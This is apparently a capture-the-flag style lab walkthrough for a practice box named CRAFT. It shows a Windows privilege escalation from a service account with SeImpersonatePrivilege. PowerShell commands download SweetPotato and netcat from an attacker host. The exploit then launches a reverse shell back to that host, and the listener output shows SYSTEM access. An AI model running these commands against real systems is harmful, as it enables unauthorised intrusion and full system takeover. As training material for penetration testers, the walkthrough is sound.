SweetPotato
The current user, apache, is a service account and has SeImpersonatePrivilege enabled.
This makes the target system vulnerable to the potato exploits
PS C:\tmp> iwr -Uri http://192.168.45.197/SweetPotato.exe -Outfile C:\tmp\SweetPotato.exe
PS C:\tmp> iwr -Uri http://192.168.45.197/nc64.exe -Outfile C:\tmp\nc64.exeDelivery complete
PS C:\tmp> cmd /c C:\tmp\SweetPotato.exe -e EfsRpc -p C:\tmp\nc64.exe -a "192.168.45.197 1234 -e cmd"
SweetPotato by @_EthicalChaos_
Orignal RottenPotato code and exploit by @foxglovesec
Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
PrintSpoofer discovery and original exploit by @itm4n
EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam
[+] Attempting NP impersonation using method EfsRpc to launch C:\tmp\nc64.exe
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c947908d-8dc3-4e0e-8000-d8d7cc875952/\c947908d-8dc3-4e0e-8000-d8d7cc875952\c947908d-8dc3-4e0e-8000-d8d7cc875952
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!Executing with the EfsRpc method
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/craft]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [192.168.45.197] from (UNKNOWN) [192.168.138.169] 50167
Microsoft Windows [Version 10.0.17763.2029]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
whoami
nt authority\system
C:\Windows\system32> hostname
hostname
CRAFT
C:\Windows\system32> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::2cf0:b138:c2e1:e87b%5
IPv4 Address. . . . . . . . . . . : 192.168.138.169
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.138.254System level compromise